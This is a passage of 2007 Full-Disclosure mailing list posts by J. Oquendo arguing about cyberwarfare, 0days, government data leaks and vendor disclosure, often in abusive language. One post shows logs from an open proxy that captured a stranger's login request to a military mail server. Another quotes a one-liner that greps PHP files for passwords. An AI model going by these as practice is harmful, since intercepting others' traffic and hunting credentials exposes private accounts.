 of such a network brush war in which possession of such an arsenal would
 be very useful.

 Crispin

One would presume that governments across the world would have their
shares of unpublished exploits but with all the incidences of government
networks being compromised, I don't believe this to be the case. What
happened in Estonia though was nothing more than a botnet attack on
their infrastructure
(http://www.informationweek.com/showArticle.jhtml?articleID=199602023)
not an 0day attack.

0day's defined as unpublished exploit wouldn't do much in a
cyberwarfare theater as country against country as the purpose of such
warfare would LIKELY be to disconnect/disrupt communications. In the
cases of industrial/country vs. country espionage it might (likely) will
 be more effective for the long haul but in the short term, 0days will
be useless in this type of cyberfight. Think about it logically, you
want to disrupt country X's communications, not tap them. You'd want
to make sure their physical army had no mechanism to communicate. You'd
want to make sure financially you would cripple them. Not worry about
injecting some crapware onto a machine for the sake of seeing what their
doing.

Reconnaissance is usually something done beforehand to mitigate your
strategy. Not mitigate what's happening after you possibly sent 1Gb of
traffic down a 100Mb pipe.



-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-25 Thread J. Oquendo
Jason wrote:

 You present a valid position but fall short of seeing the whole picture.

 As an attacker, nation state or otherwise, my goal being to cripple
 communications, 0day is the way to go. Resource exhaustion takes
 resources, something the 0day can deprive the enemy of.

Counterpoint... You're trying to shoot me down with 0day crap:

You -- 0day attack -- My Infrastructure

Me -- Botnet -- Your infrastructure

Never having to consume any resources other than a point and click shoot
em up attack, I necessarily won't even have to use my own resources. So
shoot away as your network becomes saturated.

 Knocking out infrastructure with attacks is a far more effective
 strategy. You can control it's timing, launch it with minimal resources,
 from anywhere, coordinate it, and be gone before it can be thwarted. The
 botnet would only serve as cover while the real attack happens.

In a strategic war, most countries aim to eliminate supply points and
mission critical infrastructure as quickly as possible. In a
cyberwarfare situation me personally, I would aim to 1) disrupt/stop via
a coordinated attack whether its via a botnet or something perhaps along
the lines of a physical cut to a nation's fiber lines.

0day would only serve me afterwards to perhaps maintain covert states of
communication. Maybe inject disinformation through crapaganda. Imagine
an enemies entire website infrastructure showing tailored news... Would
truly serve a purpose AFTER the attack not during.

 I am more inclined to believe that botnets in use today really only
 serve as cover, thuggish retribution, and extortion tools, not as
 effective tools of warfare. No real warfare threat would risk exposing
 themselves through the use of or construction of a botnet.
 

Luckily for most companies and government, botnets aren't being used for
their full potential. And I don't mean potential as in they're a good
thing. I could think up a dozen cyberware scenarios in minutes that
would cripple countries and businesses. I believe countries, providers
and governments should at some point get the picture and perhaps create
guidelines to curtail the potential for havoc - imagine hospitals being
attacked and mission critical life saving technologies taken offline.



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-21 Thread J. Oquendo
[EMAIL PROTECTED] wrote:

 But a 0 day vulnerability is meaningless as a definition; it applies to
 a vulnerability for exactly 24 hours and then is meaningless.  ALL 
 vulnerabilities were discovered at some point and had their 24 hours of
 0 day fame by your definition.  It just does not make sense.
 
 Casper
 

Should we now create a new term for the industry +0day or 1day. How
about? nowaday

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Mlabs] Scrutinising SIP Payloads - Someone break his e-kneecaps please

2007-09-20 Thread J. Oquendo
First of all you should credit ALL the individuals, companies and sites
you rip your information from else its called plagiarism

On Page 12. Word for word you simply copied:
http://www.cisco.com/en/US/docs/voice_ip_comm/sip/proxies/2.0/release/notes/stnSolRn.html

Temper the contents and make it work according to attackers usage.
What the hell are you talking about...

You stated The Cisco proxy server does not accept calls after 150 cps
I don't know what the hell you were using but Netra's can easily push in
upwards of CPS, IBM X's 1000 via udp, 200+ via tcp...

On Page 19 you stated Wiretapping Attacks: These are the generic class
of attacks which take place when modification of communication channel
is done by an attacker between two parties. ... Really? So when I'm
running VoIPong and nothing is getting modified yet I'm steady
recording a conversation what is this called. An unmodified wiretapping
attack.

That paper was yet another waste of time for me to read. Instead of
copying and pasting to your hearts content and putting together
something that makes sense only to you, why don't you first try to
understand 1) what the hell you're talking about 2) what the hell you're
writing about 3) what the protocol truly does and then - what attacks
are possible based on something you truly know - as opposed to something
you may think sounds logical.

Page 28: It can be exploited by the attackers to have Denial of service
attacks. The mechanism starts from the payload designing. The actual
infection starts or is mainly coded in the payload itself by the
attackers. What kind of high potent hashish are you smoking?

Outside of these ignorant assumptions you make based on what I infer as
an overall lack of knowledge on the subject, I could barely skim through
the rest of your document since it was mainly terrible english with huge
chunks of copied RFC material and ramblings that made zero sense.
Nothing worth noting - other than me repeating in my head this jackass
should STFU and learn what he's talking about instead of making an idiot
out of himself

And I don't mean to sound harsh - well yea I do, but that's irrelevant.
What you're doing is flooding the industry with bullshit documents that
those without a clue might read and become even more clueless. Please
stop your ramblings.


J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Symantec Contact?

2007-09-18 Thread J. Oquendo
 What's really Sad is that Symantec does not have an option for the
 general public (i.e. Independent Virus Researchers) to submit virus
 samples .

 You have to either
 A. Submit it through their product.
 B. Have a Corporate Support contract.

 Guess they don't want new samples.

On the devil's advocate side, maybe they don't have it since it would be
trivial for a virus creator to flood them with bogus information. Its
easy to point a finger and say shame shame shame on you guys. You guys
blow, foobar, cry, but I've yet to have an instance where I was looking
for a point of contact at a vendor and not found one.

Most times I get the impression the (l)user on the mailing list
disclosing sends out one email knowing damn well the ratio for a
response will be low - especially when a response was sent to abuse or
contact or some other generic account. They then run along to a
mailing list(s) then cry foul Vendor absent. Typical nowadays when
many that I've seen come and go never learning much other than how to be
a PACH. (buzzword - Point And Click Hacker).



-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Pro US government hackerganda

2007-09-18 Thread J. Oquendo
jf wrote:
 Well either you're full of it, they're full of it, or you just plainly
 misunderstood. In every place I've ever seen TS data getting transmitted,
 they're not using any cipher you've ever heard of, both ends of the
 connection use something like a kg-175 (now known as a taclane, you're lie
 would've been better if you had found out about these in your time spent
 using google), which uses NSA encryption and because of the crypto-module,
 is classified.

Oh right every single department in the government and agency has one
along with with kiv-19's because after all everyone connects back to
DREN. Right I forgot its all over TRADOC manuals. How stupid can I be to
not know this
(http://web.archive.org/web/*/http://venona.antioffline.com) my bad.

 Now what's possible (assuming this isnt the figment of your imagination),
 is that they were transmitting data rated at secret, which IIRC can use
 AES 128, depending on the implementation.

 So like I said, you're either making it up, misunderstood them, or they
 were having fun with you.

No they were deathly serious about using EV-DO to transmit Top Secret
documents over the wire and wanted to know it was sniffable period.

 So what, you think because you found some documents on google that this is
 how the data is getting lost and this all somehow makes you authoritive?
 Here is the simple truth, as is the usual with many of you
 ex-feed-the-goats/etc kids, you just don't know wtf you're talking about.

Documents on Google? One in the government shouldn't be worried about
documents on Google they should be worried about idiots behind some of
those government machines which leave information not intended for the
public on them. [1]

I recall back in the mid to late 90's mirrors of dozens maybe hundreds
of military, NASA sites left and right getting pwnd daily, hourly. Why
these machines were up and on the Internet is anyone's guess from the
public side. As to why someone would compromise them, the answer should
be obvious to anyone with half a clue.

It's alright to vent your frustration but I'm not the idiot putting up
machines on the Internet when they shouldn't be there. I'm not the one
who's allowing idiots to post classified information over non secure
channels when they should know better. Facts are facts. Don't shoot the
messenger:

// begin
[1] Numerous US military documents, some of which have critical
strategic importance, have been found on publicly accessible ftp
servers. ... Some of the most sensitive information found by AP included
details of security vulnerabilities at a contingency operating base,
security features at Tallil Air Base and plans of a military fuelling
facility. Some files were apparently password protected, but in one case
the password was given in another document on the same server.

When asked for his views, Bruce Schneier called the leaks a sloppy user
mistake - an understatement of monumental proportions ...
http://www.heise-security.co.uk/news/92653
// end

Some files were apparently password protected, but in one case the
password was given in another document on the same server. What's that
you were saying about stupidity?

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] RFP Interview

2007-09-17 Thread J. Oquendo
The legend behind responsible full (responsible) disclosure - something
which so many retards new to the industry have yet to learn - answered
some qa's for those interested. Mainly for those more in tuned with
full disclosure not fool disclosure.

http://www.infiltrated.net/?p=25



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Pro US government hackerganda

2007-09-14 Thread J. Oquendo

 You're suffering from a logical falicy, I worked in that arena (albeit
 it a different agency) in incident response for quite some time

Nice to know. I hope my government can either install ispell or send
some of you guys to Clueful University.

 of workstations and servers on a regular basis and downloaded
 everything that ended in extensions like .pdf, .eml, .doc, et cetera,
 it wouldn't take that long to get up to very high numbers. This is
 exactly what has occurred and makes your assertion that of ignorance
 and presumption.

So again, look at the statement from the previous article where the boys
from this gov state NIPR. Translation? Shit anyone can find on
Google.com/unclesam


 You again fall victim to foolish ignorance and presumption, just
 because a red network isn't connected, doesn't mean a yellow network
 isn't. I can't speak for DoD in that sense, I just know how it works
 in other agencies.

I just know how it works in other agencies Not knowing, isn't this
the same quote on quote ignorance you accused me of. If you don't know I
would Google STFU if you haven't already heard/been told the term.

 Furthermore, with ratings like SBU/et cetera, and lots of it, you can
 gain valueable intelligence by combining all of it.

Irrelevant to what the government has stated. China has hacked
TERABYTES OF DATA ... Define hacked. Google hacked? How about gov
employees get a clue before they decide to leave top secret information
on a non secure webserver.

Here is one for you from the horses mouth. 100% true so help me any
deity. So I get a group of individuals visit my company about two weeks
ago. Golf shirts slacks, etc., really clean cut. Nice little blue and
white plates can be seen from the conference room with a big old G on
it. They start asking about pentesting EV-DO... They ramble on and
mention we're using 128 bit...

Wait a minute I told the gentleman. You know you shouldn't be using
128 bit for encryption of TS documents in according with NIST. (And I
know this because I got a personal schooling from Bruce Schneier on
this. (http://www.cnss.gov/Assets/pdf/cnssp_15_fs.pdf for clarity on
this)) Their response: We know but we have M16's on each side of the
stream and they chuckled.

My thoughts at that time... What a bunch of idiots. So what. M16's mean
nothing if you can't track someone sniffing you - you idiot... In
essence its stupid - and I sincerely and obnoxiously mean this - STUPID
IDIOTS in the government who allow these so called pseudoIntrusions
(add that to your buzzwords too).

See an intrusion hasn't occurred here period, error and human stupidity
has though and now the US government is calling the kettle black. In
case you have either forgotten or never heard of the abuses of ECHELON
not to even bother pointing out the mess we have in this country with
our warrantless MM color coded uberDuber terrorAlert crapaganda systems.

So politics aside, its stupidity black and white, not an intrusion that
is leading to the compromise of data. If the data is on unsecured
webservers that are on the Internet, don't blame the ingenuity of
someone for finding something that should have been on SIPR instead of
being online (NIPR) to the public in the first place.

The gov should re-iterate the differences between SIPR, NIPR, RIPR and
other systems to clueless idiots on computers, servers, crackberries or
whatever other mediums they choose to use.



-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Pro US government hackerganda

2007-09-14 Thread J. Oquendo
lostzero wrote:
 You're looking at it from the wrong view.  The 20 terabytes didn't happen
 overnight.  Without a starting time frame you have no idea how many years
 it has been happening.  Not to mention they have workstations and servers
 all over the world.  Which means no 1 agency or individual looks at all the
 traffic from all the locations at the same time.  If your network produced
 terabytes of traffic a day, 50-100mb isn't that eye catching.

Again many of you seem to be missing the bottom line here... oh noes
deesa been from a many machines massa. Irrelevant. If someone is coming
into a GOVERNMENT AGENCY those machines with classified information
should be LOGGING and those LOGS should be MONITORED as per GOVERNMENT
rules. So whatever someone feels should have could have would have is
all irrelevant. There are rules set up for those in office to follow.
They're not being followed. Start threatening some of these people with
penalties I guarantee you that lazy ass SMSGT won't decide Gee... I
think I'll put this Top Secret document on a public webserver so I can
see it later from home... won't occur.


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Pro US government hackerganda

2007-09-13 Thread J. Oquendo
Robert Lemos wrote:

 In this case, without judging how truthful the Chinese are being

Hackerganda... Buzzword? Who cares. Lets play Politrix, here goes...

China has downloaded 10 to 20 terabytes of data... said Maj. Gen.
William Lord, director of information, services and integration in the
Air Force’s Office of Warfighting Integration and Chief Information
Officer, during the recent Air Force IT Conference in Montgomery, Ala.
(http://www.computerworld.com/blogs/node/3320)

1) 10 - 20 terabytes? Undetected? What a marvelous feat. What kind of
connection did they have to do this without being detected since they
bbviously they went undetected for at minimum, 10 terabytes of data
according to this quote. Who was watching logs? Were they asleep at the
wheel too a-la 9/11 pseudointelligence agencies. Maybe China borrowed
Peter Lothberg's mothers backbone to do this
(http://slashdot.org/articles/07/07/12/1236231.shtml)

2) Notice how the remainder of the quote was left off? Here it is in
full: “China has downloaded 10 to 20 terabytes of data from the NIPRNet
(DOD’s Non-Classified IP Router Network),”  Funny NIPRnet is unimportant
information in fact a majority of it can be found via
www.google.com/unclesam


Outside of this play on words in all honesty if the US government gets
its information stolen then they deserve it. What the hell am I paying
uber taxes for outside of the War in Vietnam2k.

Here is a story since people will make what they want out of it. Story
goes, a friend was talking to another friend who happened to be a
platoon leader in Iraq. The military friend spoke in angst to his friend
because his squadron was sending out orders to each other pre-tour via
hotmail and IM. Secret, Top Secret information... All went out via non
secure channels. Hows that for security.

How about those moronic diplomats who confused anonymity with security
and were logging into their email accounts with a tor proxy. Hrmm...


torny# whoami
root
torny# cd /usr/local/squid/logs/
torny# ls -ltha cache.log
-rw-r-  1 squid  squid40K Sep  6 09:49 cache.log
torny# ls -ltha store.log
-rw-r-  1 squid  squid   602K Sep 13 11:16 store.log
torny# tail -n 2 store.log
1189611525.071 RELEASE -1  B8721ECBA84E697E3D431CC57BEF9972  200
1189611784-1-1 text/plain -1/138 GET
http://www.google.com/tools/swg2/update?
1189700157.679 RELEASE -1  28228FB9480AEE7916FD738A209C6027  200
1189700417-1-1 text/plain -1/138 GET
http://www.google.com/tools/swg2/update?

Funny thing is I leave this opened purposely as part of a honeypot.
Never have I used my squid proxy server but guess what:

torny# grep login store.log
1187186702.458 RELEASE -1  0EE6D49B3E4BA072166EBF15AAF26ABE  200
1187187634-1 375007920 text/html 599/599 POST
http://xxx.x.mil/mail/login.asp

Wait... Am I running an [EMAIL PROTECTED]@%$ ... The government needs to get
their stuff together period. As for the hey chinese hax0red our
google.gov toolbar ... no USA hacker Chinese Great Steamed Dumplings
BS its all political chess. If the US truly wanted to stop it they COULD
(note the word COULD), question should be do they really want to or are
they (the US) simply filling these vulnerable machines with honeypot
garbage material.


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Came across this site

2007-09-10 Thread J. Oquendo
Brian Toovey wrote:

 At the risk of getting flamed...

At the risk of cry babies whining I shall chime in.

Oct 2007 Infiltrated dot net will take off where I left AntiOffline off
in 2001. After reading so many shitty websites with distorted views of
security in general, I decided to bring back the In Your Face news and
Interviews of yestermillenium.

It won't be geared towards luzer assed look at me grep -i passwd
*.php|echo l33t [EMAIL PROTECTED] but more towards
interviews with people I find make the security scene worthwhile. My own
personal, obnoxious, clueless ramblings, and outakes on security in general.

For those on the scene pre-2001 keep on the look out for a top ten
questionnaire coming to your mailboxes. For those under the age of
tenteen, still in high school, freshmen/sophomores in college and romper
room kiddiots keep away.

Stay tuned.



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] World's most powerful supercomputer goesonline (fwd)

2007-09-03 Thread J. Oquendo
[EMAIL PROTECTED] wrote:

 Uh... I think you're missing some key
 points about the gov't and the internet. 
 First off, all methods of connecting to
 the internet (cable, DSL, etc) invariably
 fall under the control of the FCC.

Oh really all of the methods. Including those
outside of the juridstiction of United States
laws. This is certainly news to me and I'm
sure its also news to many other persons and
countries outside of the United States.

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Interesting fun with Cisco VPN Client Privilege Escalation Vulnerabilities

2007-08-16 Thread J. Oquendo
James Lay wrote:

 You'll need a LOT more then just the site and serial number...you'll need to
 be registered with Cisco or provide them with:
 
 REQUIRED INFORMATION
 
 * CONTACT NAME: 
 * CONTACT PHONE NUMBER:
 * CONTACT CISCO.COM USERID (if one exists):
 * CONTACT EMAIL ADDRESS:
 * CONTRACT #: 
 * SERIAL #: 
 * PRODUCT TYPE (Model Number):
 * SOFTWARE VERSION:
 * COMPANY NAME: 
 * EQUIPMENT LOCATION (Address):
 * BRIEF PROBLEM DESCRIPTION:

And? The problem is what? I've had firmware upgrades done via the TAC
without a contract before. I've had firmware updates done via the TAC on
stuff I bought from eBay too. Pain in the ass yes, impossible, no. Might
take a little gift to gab, but I can tell you I've gotten what I needed
when I needed it and I have enough Cisco crap lying around to disprove
this message the world over. (http://www.infiltrated.net/rewired/ not
even up-to-date at this point)

 The product that you requested support for is an older product that has
 passed the warranty period date for that product.  Once a product becomes
 End of Sale, it is supported for three years
 beyond the End of Sale date and then becomes End of Support.

End of Support is self explanatory. Do you expect any vendor to go
backwards. What incentives do they have to do so. It would be more
costly for most to do so, use some common sense, its not like they will
have product X still being sold be a re-seller to support it. They gave
you X amount of time notice that X product is at the EOS stage, then
told you look its EOS but we'll still deal with it for 3 years after
that. Plan ahead.


 The last gig is:
 
 The Cisco VPN Client for Windows is available for download from the
 following location on cisco.com:
 
 http://www.cisco.com/pcgi-bin/tablebuild.pl/windows?psrtdcat20e2 
 
 Heh..nothing there.
 
 Interesting...VERY interesting ;)

Apparently you had difficulty reading (or including) the entire print:

http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html

The Cisco VPN Client is included with all models of Cisco VPN 3000
Series concentrators and Cisco ASA 5500 Series security appliances
(excluding ASA 5505), and most Cisco PIX 500 security appliances.
Customers with Cisco SMARTnet® support contracts and encryption
entitlement may download the Cisco VPN Client from the Cisco Software
Center at no additional cost. For customers without Cisco SMARTnet
support contracts, a media CD containing the client software is
available for purchase. This CD does not provide access to the most
current patch releases.

Do you have a Smart Net contract, if so, guess what, its free to
download, if not, pay for the cd... No voodoo in those words. Would be a
different story had you posted I logged in with my Smart Net and there
is nothing there what gives!. Anyway...

So how was this relevant to any form of full-disclosure I ask since
puzzled me a little. Who knows I just keep reminding myself of my my
dyslexia (fool||full-disclosure), keeps me stable.

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

2007-08-15 Thread J. Oquendo
Aditya K Sood wrote:

 Embarrassment. Nothing lies beneath it. Critically your are too much at
 of your own in deciding.


Personally, this is just another kiddiot on my filters. I only see the
residue of responses to him. I believe every single advisory this
*person* (play nice now) has sent out has 1) never been verified 2)
never been worthwhile 3) repeat steps 1 and 2.

I plan to release some advisories myself too sometime this millenium. I
found that if you allowed these miserable posts to fill your mailbox,
your machine will fill up space... Then crash... And crashing is a bad
thing. Which is a DoS. Which is evil. Translation... Re-blocking APNIC
and RIPE ranges. Evil hackers out there. Pop Up blockers... Scare-e...
IE? I'm so owned as of last weekend months ago.


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] intrusion kit

2007-08-03 Thread J. Oquendo
Joshua Tagnore wrote:

 unzip kit.zip
 cd nmap
 nmap -sS localhost
 cd ..
 cd vnc
 run-vnc-server
 
 Does this exist? Could anyone please share his experience with this
 problems ?
 

I have one I will be throwing up for sale on eBay to the highest suc...
bidder. Not only will it do what you just asked for, but here is a
complete list of what it will do:

Detect and covertly bypass firewalls
Detect and covertly bypass infrared sensors
Detect and play cards with IPS/IDS'
Detect and remove Harry Potter related stolenware

And, if you act now and become the highest bidder, it will even let you
ǝlzzıu ɥɐɯ ǝlzzıɥs ʇǝǝɹǝ ɹǝdns ǝɯos op


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wachovia Bank website sends confidential information

2007-07-11 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

On Tue, 10 Jul 2007 21:39:33 EDT, Jim Popovitch said:

  

7 days?   industry practice?   Come on Bob I know you know that large
corporations can't feed a cat in 7 days let alone make unscheduled
website changes that fast.  Change control approvals alone would include
14 or more days in most enterprises.   Why the rush to say so?



On the other hand, I think that they *could* manage at least a Wow d00dz, we
really *do* have a hole there reply and at least give a handwaving about
when they'd fix it.  Of course, actually *fixing* a design flaw that big
is going to take them *months*.
  


Driver walks into a dealer and speaks to customer service:

These brake pads are extremely vulnerable to slipping during X
conditions on a 90 degree slalom says the driver. Puzzled and
not knowing squat about slaloms, or the breaking system, the
customer service rep send the driver to a mechanic.

These brake pads are extremely vulnerable to slipping during X
conditions on a 90 degree slalom. Someone will die! says the
driver to the mechanic... Not being able to change the auto's
design nor engineering, the mechanic is puzzled and offers to
take the information although he is even more puzzled on who
this should be directed to.

Two days later driver rambles on news stations nationwide:
Their arrogance will get people killed. I warned them repeatedly
People moan and grumble, etc., recalls, fixes...

This Wachovia thread is pointless. I see no mention or posting
to perhaps any security list (and I'm on many both public and
private) saying: Hey is there anyone who can put me in touch
with someone in the know at Wachovia on any list. All I see
is... I called customer service. So what, if you're a security
professional you will know damn well you're getting nowhere
with them. I spoke to their w3bm4ster. And? Either the poster
is looking for attention or a complete and utter idiot. If his
or her true intention was to provide a report of a security
woe concerning said business or product, he or she could have
easily jumped on any security mailing list and found the right
connection instead of rambling on the sky is falling...

Let me see:
wachovia security cissp incident +network via Google

This looks interesting:
http://www.bryceporter.com/

I would have contacted someone on this level to put me in
touch with the right person. But hey, guess its more hip
to add stupid little tags next to your resume or webpage:
I broke $INSERT_VENDOR_HERE




--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wachovia Bank website sends confidential information

2007-07-11 Thread J. Oquendo

Bob Bruen wrote:
While it is true that lots of folk pick on vendors for a few minutes of 
fame, the Wachovia case is slightly different.


They do have an attitude problem and are technically challenged. The basis 
for this is a law enforcement conference about six months ago. During a 
pressentation a Wachovia representative told a speaker to stop blaming the 
banks for problems. This was the third presentation this individual has 
listened to in which each speaker had blamed the banks for not doing 
enough and the frustration level was a bit high.


This only comes up because of the current Wachovia web site issue. It 
shows that there is an internal problem, worse than most, endind with the 
current situation. And no I will not indentify any of the players.


   --bob
  


Mechanisms of politrix... I was doing contract work from home for a
HUGE-O-MONGOUS tech company I won't name (NDA) and was assigned to
do fw administration, configuration for a bank that outsource it to
this HUGE-O-MONGOUS monster. When we needed to implement a change
these were the steps:

Uh oh.. We're seeing attacks from network X ...

1) Call manager
2) Manager calls his manager in another state
3) That manager calls sales rep
4) Sales rep called the bank's contact
5) Bank's contact called his security team
6) Hey security team, you need to speak with your contractors
7) Security team to bank's contact ok make a conference call
8) Bank's contact to the sales rep - ok make a conference call
9) bank sales rep to HUGE-O-MONGOUS' sales rep - ok make a conference call
10) manager to manager - hey we're going to do a conference call
11) No wait... My contractor is tied up... Can we re-schedule?

In essence, when we needed to do things, it wasn't as cut and
dry as I thought it would be. In fact it was downright frustrating.
Here you are Rainwall open, NSM open about to fire off changes
but have to wait for at minimum 4 business days hoping no one
up the food chain was unavailable to make a mission critical
change.

Long story short, while at HUGE-O-MONGOUS I was surprised I
was even given the opportunity to be there - but hey contractors
liabilities, etc., legal foobarfoo wording exculpated HUGE-O-MONGOUS
company from the whole shmoo (compsec historians know the HIStory),
anyhow, I got frustrated working for them. I felt as if it was
such a dead end. Mind you I was making about $80.00 per hour
to roll out of bed and do work pretty much whenever I wanted.

Sometimes, things aren't as clear cut as one may think they are.
To me the initial Oh noes! Wachovia is evil post was nothing
more than someone itching for their Andy Warhol 15 minutes. With
that said... Off to lunch...


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

2007-07-03 Thread J. Oquendo

Nick FitzGerald wrote:


_AND_ at least they noticed and moved to act against it.

Every day, many hundreds of thousands of _successful_ attacks against 
corporations, small businesses and private individuals not only go 
unreported by them, but entirely undetected and largely unnoticed by 
the _attacked_.


The reason for this comment?  A great many of those mocking the DHS 
over this incident are part of the group just mentioned and are too 
stupid to ever realize it...





An also *informed* number of members realize the potential of gaining
greater budgets by leaving machines vulnerable in an effort to lobby
congress for yet more pork barrel money to secure these networks
from uber hackers. So let's sift through crapaganda while its on
the table shall we.


/* SNIP */
“China has downloaded 10 to 20 terabytes of data from the NIPRNet
(DOD’s Non-Classified IP Router Network),” said Maj. Gen. William
Lord, director of information, services and integration in the Air
Force’s Office of Warfighting Integration and Chief Information
Officer, during the recent Air Force IT Conference in Montgomery,
Ala. (http://www.gcn.com/print/25_25/41716-1.html)
/* END SNIP */

20 Terabytes huh. Unnoticed 20 terabytes? At that rate they would
need some massive pipes to download this all undetected. Let's
analyze the comment and the logic...

20 terabytes on an OC3 would take you 291 hours 44 minutes and 16
seconds give or take. Gigabit Ethernet, 45 hours 30 minutes and
change... So how did they manage do achieve this marvelous feat
of magic undetected. It obviously couldn't be at high speeds
which means they would have had to either go on undetected for
